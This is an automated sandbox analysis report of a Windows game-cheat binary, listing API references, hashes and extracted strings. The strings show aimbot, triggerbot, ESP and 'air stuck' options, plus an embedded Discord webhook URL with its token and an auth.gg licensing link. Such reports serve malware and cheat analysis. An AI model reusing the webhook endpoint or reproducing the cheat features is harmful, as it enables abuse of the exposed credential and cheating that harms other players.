Part of subcall function 00007FF78661A3E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661A505

exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661CE90
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661D11D

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8

Part of subcall function 00007FF786613980: memset.VCRUNTIME140 ref: 00007FF7866139B0
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A00
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A12
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A24
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A36
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A48
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A5A
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A6C
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A7E
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A90
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AA2
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613AB4
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AC6
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AD8
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AEA
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AFC
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B0E
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B20
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B32
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B44
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B56
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B68
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B7A
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B8C
Part of subcall function 00007FF786613980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF786613B9E

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661D1BD

Strings

Semi Config, xrefs: 00007FF78661D452
Prediction , xrefs: 00007FF78661CBF0
Fov Size, xrefs: 00007FF78661C7D7
%.0f, xrefs: 00007FF78661B35E
config.json, xrefs: 00007FF78661D0CD, 00007FF78661D16D
Prediction , xrefs: 00007FF78661CC92
##Main1, xrefs: 00007FF78661D00C, 00007FF78661D040
Shotgun Settings, xrefs: 00007FF78661CB3B
Distance, xrefs: 00007FF78661CA7D
Sniper Settings, xrefs: 00007FF78661CD21
Save Config, xrefs: 00007FF78661D0A7
Combat, xrefs: 00007FF78661C22E
##Main, xrefs: 00007FF78661C505, 00007FF78661C539
Air Stuck, xrefs: 00007FF78661CE68
(AIR STUCK)RISKY FEATURE:, xrefs: 00007FF78661CE50
Sniper Smooth, xrefs: 00007FF78661CD73
Box, xrefs: 00007FF78661C99E
SMG Smooth, xrefs: 00007FF78661CC2F
Triggerbot, xrefs: 00007FF78661C672
Rifle Settings, xrefs: 00007FF78661CC7F
Hitbox, xrefs: 00007FF78661C8AE
Snapline, xrefs: 00007FF78661CA44
Rank, xrefs: 00007FF78661CA0B
Rage Config, xrefs: 00007FF78661D4B6
Weapon, xrefs: 00007FF78661C328, 00007FF78661C9F8
Triggerbot Distance (m), xrefs: 00007FF78661C772
Rifle Smooth, xrefs: 00007FF78661CCD1
Fov Circle, xrefs: 00007FF78661C785
Shotgun Smooth, xrefs: 00007FF78661CB8D
@, xrefs: 00007FF78661B59E
Orqur Public, xrefs: 00007FF78661B382
Username, xrefs: 00007FF78661CA31
Smoothing, xrefs: 00007FF78661C816
Aimbot, xrefs: 00007FF78661C5B6
Unload, xrefs: 00007FF78661CE7E
Prediction , xrefs: 00007FF78661CD34
Legit Config, xrefs: 00007FF78661D3EE
Sniper Fov, xrefs: 00007FF78661CDB2
%.3f, xrefs: 00007FF78661C74B
Misc, xrefs: 00007FF78661C422
SMG Settings, xrefs: 00007FF78661CBDD
Config, xrefs: 00007FF78661C3A5
Render Count, xrefs: 00007FF78661CA90
Prediction, xrefs: 00007FF78661C65F, 00007FF78661CB4E
Shotgun Fov, xrefs: 00007FF78661CBCC
Fov Arrows, xrefs: 00007FF78661CA6A
Options, xrefs: 00007FF78661D38F
Triggerbot Delay (ms), xrefs: 00007FF78661C72D
Corner, xrefs: 00007FF78661C957, 00007FF78661C989
Draw Filled, xrefs: 00007FF78661CA1E
Weapon config, xrefs: 00007FF78661CB2A
Skeleton, xrefs: 00007FF78661CA57
Save/Load, xrefs: 00007FF78661D04C
Filled Fov, xrefs: 00007FF78661C798
##Mains, xrefs: 00007FF78661D34F, 00007FF78661D383
Load Config, xrefs: 00007FF78661D143
SMG Fov, xrefs: 00007FF78661CC6E
Rifle Fov, xrefs: 00007FF78661CD10
Visuals, xrefs: 00007FF78661C2AB

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memcpy$AsyncCreateStateThreadexitfreemallocmemset
String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
API String ID: 2312794053-2218353132
Opcode ID: 0a19ecf719c1dfd3bf793fa95b1914837c7ac2961284981cd9f9382218341917
Instruction ID: 3c680e6bd0af139f24d6c8fcbbaf64e884ff656fb1e7a680d181db22455e17a5
Opcode Fuzzy Hash: 0a19ecf719c1dfd3bf793fa95b1914837c7ac2961284981cd9f9382218341917
Instruction Fuzzy Hash: 2023E772A08AC6E6E700EB25D8412EEB761FB99744FA58332DA4C57265DF7CE484CF10

Function 00007FF786617730 Relevance: 75.5, APIs: 39, Strings: 3, Instructions: 2023COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998

Part of subcall function 00007FF78661E8C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78661E9B6

Part of subcall function 00007FF78661E8C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E975

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618D04
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618D45
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618D86
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618DC5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618E04
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618E43
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618E82
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618EC1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618F00
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618F3F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618F7E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786618FC3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619008
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661904D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619092
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866190D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661911C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619161
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866191A6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866191EB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619230
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619275
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866192BA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866192FF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619344
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619389
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866193CE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619413
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619458
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661949D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866194E2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619527
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661956C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866195B1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866195F6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661963B

Part of subcall function 00007FF786629810: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF786629868

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786619680
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866196C5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661970A

Strings

success, xrefs: 00007FF78661776D, 00007FF78661779C, 00007FF7866177CB, 00007FF7866177FA, 00007FF786617829, 00007FF786617858, 00007FF786617887, 00007FF7866178B6, 00007FF7866178E5, 00007FF786617914, 00007FF786617943, 00007FF786617972, 00007FF7866179A1, 00007FF7866179D0, 00007FF7866179FF, 00007FF786617A2E, 00007FF786617A5D, 00007FF786617A8C, 00007FF786617ABB, 00007FF786617AEA, 00007FF786617B19, 00007FF786617B48, 00007FF786617B77, 00007FF786617BA6, 00007FF786617BD5, 00007FF786617C04, 00007FF786617C33, 00007FF786617C62, 00007FF786617C91, 00007FF786617CC0, 00007FF786617CEF, 00007FF786617D1E, 00007FF786617D4D, 00007FF786617D7C, 00007FF786617DAB, 00007FF786617DDA, 00007FF786617E09, 00007FF786617E38, 00007FF786617E67, 00007FF786617E96, 00007FF786617EC5, 00007FF786617EF4, 00007FF786617F23, 00007FF786617F52, 00007FF786617F81, 00007FF786617FB0, 00007FF786617FDF, 00007FF78661800E, 00007FF78661803D, 00007FF78661806C, 00007FF78661809B, 00007FF7866180CA, 00007FF7866180F9, 00007FF786618128, 00007FF786618157, 00007FF786618186, 00007FF7866181B5, 00007FF7866181E4, 00007FF786618213, 00007FF786618242, 00007FF786618271, 00007FF7866182A0, 00007FF7866182CF, 00007FF7866182FE, 00007FF78661832D, 00007FF78661835C, 00007FF78661838B, 00007FF7866183BA, 00007FF7866183E9, 00007FF786618418, 00007FF786618447, 00007FF786618476, 00007FF7866184A5, 00007FF7866184D4, 00007FF786618503, 00007FF786618532, 00007FF786618561, 00007FF786618590, 00007FF7866185BF, 00007FF7866185EE, 00007FF78661861D, 00007FF78661864C, 00007FF78661867B, 00007FF7866186AA, 00007FF7866186D9, 00007FF786618708, 00007FF786618737, 00007FF786618795, 00007FF7866187C4, 00007FF7866187F3, 00007FF786618822, 00007FF786618880, 00007FF7866188AF, 00007FF7866188DE, 00007FF78661890D, 00007FF78661893C, 00007FF78661896B, 00007FF78661899A, 00007FF7866189F8, 00007FF786618A27, 00007FF786618A85, 00007FF786618AB4, 00007FF786618B3B, 00007FF786618B61, 00007FF786618B87, 00007FF786618BAD, 00007FF786618BD3, 00007FF786618BF9, 00007FF786618C45, 00007FF786618C6D, 00007FF786618C96, 00007FF786618CBF
https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK, xrefs: 00007FF786618766, 00007FF786618851, 00007FF786618C1F
https://auth.gg/, xrefs: 00007FF7866189C9, 00007FF786618A56, 00007FF786618AE3, 00007FF786618B12

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_task
String ID: https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
API String ID: 73660495-2681837100
Opcode ID: dcae76f5e32a18d61bceb1a6437418df6aa16e57f095c71ef11884fea2810160
Instruction ID: 2c830dc6914f601f8187b3ce1e75156bca642f08d9d0068897cf56abef8499c5
Opcode Fuzzy Hash: dcae76f5e32a18d61bceb1a6437418df6aa16e57f095c71ef11884fea2810160
Instruction Fuzzy Hash: 0913A792F55BC6A4E720EB31CC413FA5312BBD7784FA06722E51C5659AEF68BAC0C710

Function 00007FF78662272A Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Champion, xrefs: 00007FF78662272A

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Champion
API String ID: 3063020102-3157597410
Opcode ID: 7576d94f8d19b4e8bdeb02c2ab4e3e49e2d77fe90305fda597ce966d4870b5ec
Instruction ID: 3e56b4467c982d97c85810596f167bf2133c3961875bc17cb2bd25c36e5d7b79
Opcode Fuzzy Hash: 7576d94f8d19b4e8bdeb02c2ab4e3e49e2d77fe90305fda597ce966d4870b5ec
Instruction Fuzzy Hash: 9282F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF786622733 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Unreal, xrefs: 00007FF786622733

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Unreal
API String ID: 3063020102-2085349250
Opcode ID: 6db129ba88c9718cc147c139c98e57828e82a25babb38257369463ddc4933334
Instruction ID: 2f675d1c46336fa327df141c0caf6b87c4c8559b084e9702064857ed9722a728
Opcode Fuzzy Hash: 6db129ba88c9718cc147c139c98e57828e82a25babb38257369463ddc4933334
Instruction Fuzzy Hash: 1382F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78662271B Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Elite, xrefs: 00007FF78662271B

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Elite
API String ID: 3063020102-374124821
Opcode ID: 660a1ce2e6335bd4480a4496a6320cfbd420d9b93cafddfcba0e3ef48deea494
Instruction ID: 8ab33002e822933838c75ddce01c85ded572735295aaebec5ee7b2e44b721106
Opcode Fuzzy Hash: 660a1ce2e6335bd4480a4496a6320cfbd420d9b93cafddfcba0e3ef48deea494
Instruction Fuzzy Hash: F6820522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

Function 00007FF78662268B Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF786629F30: memcpy.VCRUNTIME140 ref: 00007FF786629F60

Part of subcall function 00007FF786629E80: memcpy.VCRUNTIME140 ref: 00007FF786629EC6

memcpy.VCRUNTIME140 ref: 00007FF786622B05
memcpy.VCRUNTIME140 ref: 00007FF786622B13
memcpy.VCRUNTIME140 ref: 00007FF786622B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78662357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786623588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866235E1

Strings

Gold 1, xrefs: 00007FF78662268B

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

